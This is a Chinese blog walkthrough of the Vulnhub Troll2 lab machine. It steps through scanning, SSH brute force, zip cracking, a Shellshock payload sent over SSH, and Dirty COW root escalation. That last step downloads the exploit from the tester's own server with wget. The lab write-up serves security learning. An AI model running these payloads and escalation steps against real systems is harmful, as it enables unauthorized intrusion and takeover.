Troll2打靶思路详解(vulnhub)

于 2024-03-02 17:01:02 发布
阅读量1.6k 收藏 29
点赞数 38
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCcming/article/details/136418483
版权
本文详细描述了在Troll2虚拟机中进行渗透测试的过程,包括信息收集、端口扫描、web服务和ftp/ssh服务的探索,以及利用shellshock漏洞进行提权的方法。
摘要由CSDN通过智能技术生成

Troll2打靶思路详解(vulnhub)

第一步:信息收集–主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24

确定靶机IP为192.168.31.72

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.72

结果如下

在这里插入图片描述

首先对80端口所开放的web服务进行信息收集

查看web服务访问http://192.168.31.72/

!在这里插入图片描述

还是熟悉的图片…

通过dirb进行目录扫描

dirb http://192.168.31.72/

结果如下

在这里插入图片描述

访问http://192.168.31.72/robots.txt

在这里插入图片描述

我的天呐,这么多那就把robots.txt下载下来

wget http://192.168.31.72/robots.txt

通过python脚本批量查看一下那些网址可以访问

在这里插入图片描述

可以看到 /noob /keep_trying /dont_bother /ok_this_is_it 这几个网址可以访问,那就用浏览器查看一下,发现都是以下这个图片

在这里插入图片描述

完了,又被狗作者嘲讽了

然后对21端口所开放的ftp服务进行信息收集

通过ftp 192.168.31.72命令来访问

有了上一个靶机的经验,我尝试anonymous(匿名用户)进行登入,发现根本不行

在这里插入图片描述

最后对22端口所开放的ssh服务进行信息收集

还是尝试用Hydra进行弱口令爆破

hydra -L user.txt -P CommonWebAdminPass.txt -t 2 -vV -e ns 192.168.31.69 ssh

并没有什么发现

第二步:猜测与破解

进行到这里我的思路已经断了

我重新开始查看收集到的信息

在尝试连接ftp的返回信息中

220 Welcome to Tr0ll FTP... Only noobs stay for a while...

发现这里是“Tr0ll”,而不是”Troll"。我承认这里有些运气的存在

但是他ftp的账号和密码都是Tr0ll

所以接下来就是登入,查看,下载

在这里插入图片描述

发现是zip文件,解压一下

在这里插入图片描述

你妹的,有密码

第三步:WEB到杂项

已经进行到现在这个地步了,web上还是没有什么收获,我尝试用更大的字典进行扫描,还是没有结果,突然间想到有没有可能藏在图片里了,说干就干

下载

wget http://192.168.31.72/tr0ll_again.jpg

wget http://192.168.31.72/noob/cat_the_troll.jpg

wget http://192.168.31.72/keep_trying/cat_the_troll.jpg

wget http://192.168.31.72/dont_bother/cat_the_troll.jpg

wget http://192.168.31.72/ok_this_is_it/cat_the_troll.jpg

查看

strings tr0ll_again.jpg

strings cat_the_troll.jpg

最后在“http://192.168.31.72/dont_bother/cat_the_troll.jpg”这个图片里发现了以下信息

在这里插入图片描述

Look Deep within y0ur_self for the answer

翻译:
在y0ur_self深处寻找答案

所以访问

在这里插入图片描述

将answer.txt下载下来

wget http://192.168.31.72/y0ur_self/answer.txt

第四步:ZIP爆破

查看

在这里插入图片描述

看一下格式几乎可以确定是用base64算法加密的

那就解密

base64 -d answer.txt > password.txt

然后使用fcrackzip暴力破解

fcrackzip -u -D -p password.txt lmao.zip

在这里插入图片描述

得到了密码”ItCantReallyBeThisEasyRightLOL“,解压并查看zip文件

在这里插入图片描述

发现是ssh的key文件!这可太棒了!!!

第五步:后渗透–SSH登入与提权

ssh登入

ssh -i noob noob@192.168.31.72

在这里插入图片描述

发现报了个错误,我查询资料发现是SHA-1算法不安全,新版本的openssh已经禁用了,临时解决方法加上-o PubkeyAcceptedKeyTypes=+ssh-rsa参数。

所以使用以下命令连接

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa

在这里插入图片描述

狗作者告诉我

TRY HARDER LOL!

翻译:
更努力,哈哈

经过查询资料发现可以通过利用shellshock漏洞来获取会话

(shellshock漏洞原理较为复杂,感兴趣的同学可以去看看)

所以playload如下

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa '() { :;}; /bin/bash'

然后还是通过python来增加shell的交互性

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

提权

查看当前用户权限

id

sudo -l

在这里插入图片描述

可以看出只是普通用户的权限

直接查看内核和gcc版本,看看能不能使用脏牛进行提权

脏牛链接https://github.com/FireFart/dirtycow

在这里插入图片描述

感觉差不多,那就冲

本地python启动http服务

在这里插入图片描述

使用wget命令下载靶机

wget http://192.168.31.213:8000/dirty.c

编译,执行

gcc -pthread dirty.c -o dirty -lcrypt

./dirty my-new-password

在这里插入图片描述

成功了,登入firefart用户,恢复“/etc/passwd!”

su firefart

mv /tmp/passwd.bak /etc/passwd

看一下权限

id

在这里插入图片描述

可以看到已经是root权限了

最后就是拿flag了

在这里插入图片描述

至此完结,撒花。

MCcming
关注
  • 38
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机VulnHub-Tr0ll2
wo41ge的博客
12-25 394
找到了此次CTF目标计算机IP地址:192.168.86.174 21、22、80端口 直接访问 查看 源代码 图片下载 进行 查看 发现作者是Tr0ll 可能 是一个 有效的用户名 直接尝试/robots目录 把这个文件robots.txt下载下来 剔除反斜杠,使用dirb进行批量尝试,挖掘可用的目录 发现4个可用的目录 以此访问上述4个目录,并查看其网页源码 发现有用的信息 四个目录都是如此 下载下来 strings分析看一下 根据上面提示获得存在隐藏目录y0ur_self 尝试.
OSCP练习:vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4341
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
渗透项目(四):Tr0ll
Ays.Ie的博客
10-27 1411
本文记录作者第4个渗透项目,希望对渗透感兴趣的同学有所帮助,随后还会更新一些其他工具使用的文章
2、vulnhub-tr0ll-2
qq_42660246的博客
09-18 116
成功登录ssh三种方式,详见链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh。前面找到偏移量之后,可以知道栈空间大小占据空间位置,接下来要找到跳板地址也就是ESP,就可以跳到恶意代码shellcode的位置。类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于。发现下载下来的4个图片中,2.jpg 明显不同,使用16进行编辑器查看。
Linux unzip命令
dency
05-27 382
Linux unzip命令用于解压缩zip文件 unzip为.zip压缩文件的解压缩程序。 语法 unzip [-cflptuvz][-agCjLMnoqsVX][-P <密码>][.zip文件][文件][-d <目录>][-x <文件>] 或 unzip [-Z] 参数: -c 将解压缩的结果显示到屏幕上,并对字符做适当的转换。 -f 更新现有的文件。 -l 显示压缩文件内所包含的文件。 -p 与-c参数类似...
GUI.rar_Troll_qt commercial
09-19
**Qt图形界面框架详解** Qt,源自挪威Troll Tech公司的创新之作,是一个强大的跨平台C++图形用户界面(GUI)工具包。它以其卓越的性能、丰富的功能和易用性在开发者社区中广受赞誉。Qt支持多种操作系统,如Windows...
Troll Project 2:一个棘手的应用程序。-开源
07-16
【Troll Project 2: 一个棘手的应用程序 - 开源】 Troll Project 2 是一个开源项目,意味着它的源代码对公众开放,允许用户查看、修改和分发。开源软件的理念鼓励协作与创新,使得开发者社区能够共同参与项目的开发...
Troll Bait
10-28
Troll Bait
Troll:在朋友计算机上开个玩笑
05-15
标题中的"Troll"在这里指的是一个恶作剧或者玩笑,而这个项目显然与在朋友的计算机上执行这样的玩笑有关。描述简单地提到了“巨魔”(可能是网络用语,指开恶作剧的人)和对Python 3的依赖。标签包括了"python"、...
troll-开源
05-01
troll(例如patchDownload)是一种自动代理,可以出于安全考虑对系统进行修补。 获取可用补丁列表与已安装的比较检查完整性安装那些可以并且不要破坏依赖关系的文件
Vulnhub系列-Tr0ll-2
Yasso的博客
12-24 643
靶机:192.168.249.136 kali: 192.168.249.132 一、信息收集 nmap -sV -sS -A 192.168.249.136 –查看开放端口及服务 –ftp 21端口发现需要用户名和密码— 猜测用户名可能是Tr0ll 试了试密码也是这个 有个zip但要密码 dirb http://192.168.249.136/–对80端口http服务深入探测– –robots(.txt)可以正常访问– –应该是目录,作为字典扫一下— dirb http://192.168.2
vulnhub-Tr0ll: 2 (考点:脑洞/猜猜猜/linux缓冲区溢出)
冬萍子癸水
04-23 421
https://www.vulnhub.com/entry/tr0ll-2,107/ nat模式, arp-scan -l 比平常多出来的ip就是靶机 这靶机跟上一个同名作品1一样继续考脑洞,猜猜猜,后面的缓冲区溢出,更是3个door不停的变换加断掉ssh加禁止ls等,够无聊的。。。。 这个缓冲区溢出,也挺诡异,我搜了这台靶机中国人写的外国人写的很多文章。esp地址和shellcode有的人这个可...
渗透测试靶机---Tr0ll
久恙502的博客
10-28 306
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Troll打靶思路详解vulnhub
最新发布
MCcming的博客
02-29 1648
使用Hydra进行弱口令爆破通过结果发现短时间内只能尝试3个账号的登录。
vulnhub靶场--Tr0ll2靶场
zzzzzzkeai的博客
11-27 819
vulnhub靶场--Tr0ll2靶场
Tr0ll:1靶机-Walkthrough
ins1ght的博客
09-14 2200
Tr0ll:1靶机,比较基础,提供了2种思路和5种提权方法。
2021年1月10日-Vulnhub-Troll:2 渗透学习
AnonyMousIT的博客
01-11 399
2021年1月10日-Vulnhub-Troll:2 渗透学习(未完待续) 简介 一、信息收集 访问web页面,没什么信息,作者为Tr0ll 访问robots.txt 访问第一个文件noob,是一张图片 将图片下载到本地 进行分析,没有发现 打开dont_bother文件 一张相同的文件 下载到本地分析, 说实话有点坑,不看网上的教程根本不会发现 尝试访问y0ur_self文件 发现answer文件,打开,全是base64编码 对base64进行解码,并保存为txt文件,看样子好像是
Vulnhub系列-Tr0ll-1
Yasso的博客
12-23 1574
靶机:192.168.249.135 kali: 192.168.249.132 一、信息收集 nmap -sS -sV -A 192.168.249.135 —查看开放端口及服务探测 21端口ftp服务、80端口 nikto -host http://192.168.249.135/—对80端口http服务深入探测(并无可用信息) 访问下21端口ftp服务 –发现个pcap数据包,用wireshark查看下追踪TCP流– 发现用户名/密码=anonymous/password(貌似假的ssh连不上)
4-vulnhub Tr0ll
weixin_45345568的博客
06-29 414
4-vulnhub Tr0ll 下载地址为:https://www.vulnhub.com/entry/tr0ll-1,100/ 本次的靶机ip为192.168.3.17(桥接模式自动获取) 目标:根目录并从/ root目录获取Proof.txt。 一、信息搜集 1.扫描目标ip 这里使用netdiscover: netdiscover -i eth0 2.扫描端口 nmap -p 1-65535 -sV 192.168.3.17 Starting Nmap 7.80 ( https://nmap.or
C++编程 一个游戏中有多种怪物(Monster)。怪物之间可能要发生战斗(fight),每场战斗都是一个怪物与另一怪物之间的一对一战斗。每个怪物都有自己的生命值(hitpoint)、攻击力值(damage)和防御力值(defense),每种怪物都有各自特有的攻击(attack)方式,产生相应的攻击效果:战斗时,两个怪物依次攻击对方,即怪物a 首先攻击怪物b,然后轮到怪物b攻击怪物a,之后,怪物a 再次攻击怪物b,⋯⋯,直到一方生命值为0。   请根据你对上述描述的理解,定义并实现怪物类Monster,成员的设计可以任意,但要求该类至少有一个不带virtual修饰的成员函数fight,用来描述与另外一个怪物进行战斗的过程,该函数的实现可为Monster类的任意派生类所复用(派生类不需重新定义及实现)。不必考虑怪物的生命值减少至0后如何处理。
06-12
好的,根据你的要求,我来为你实现怪物类Monster。 首先,我们可以定义一个Monster类,包含hitpoint、damage、defense和attack等成员变量和函数。其中,attack函数可以用虚函数来定义,以便在派生类中实现不同的攻击方式。 ```c++ class Monster { public: Monster(int hp, int dmg, int def) : hitpoint(hp), damage(dmg), defense(def) {} virtual void attack(Monster& enemy) {} void fight(Monster& enemy) { while (hitpoint > 0 && enemy.hitpoint > 0) { attack(enemy); if (enemy.hitpoint <= 0) break; enemy.attack(*this); } } private: int hitpoint; int damage; int defense; }; ``` 在这里,我们定义了一个Monster类,它有三个私有成员变量:hitpoint、damage和defense,表示怪物的生命值、攻击力和防御力。另外,我们定义了一个不带virtual修饰的成员函数fight,用来描述与另一个怪物进行战斗的过程。在fight函数中,我们通过调用attack函数来模拟战斗,直到其中一个怪物的生命值降为0。 接下来,我们可以派生出一些具体的怪物类,并实现它们的攻击方式,例如: ```c++ class Goblin : public Monster { public: Goblin() : Monster(50, 10, 5) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; } } }; class Troll : public Monster { public: Troll() : Monster(100, 20, 10) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; this->hitpoint += damage / 2; // Troll can heal itself } } }; ``` 在这里,我们派生出了Goblin和Troll两个具体的怪物类,并实现了它们各自的攻击方式。Goblin的攻击方式是直接减去敌人的防御力,并造成相应的伤害;而Troll的攻击方式除了减去敌人的防御力外,还会使自己恢复一部分生命值。 最后,我们可以使用这些怪物类来进行战斗,例如: ```c++ int main() { Goblin goblin; Troll troll; goblin.fight(troll); return 0; } ``` 在这个例子中,我们创建了一个Goblin对象和一个Troll对象,并让它们进行战斗。由于我们在Monster类中定义了通用的战斗方式,因此我们可以直接调用fight函数进行战斗,而不用考虑具体的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值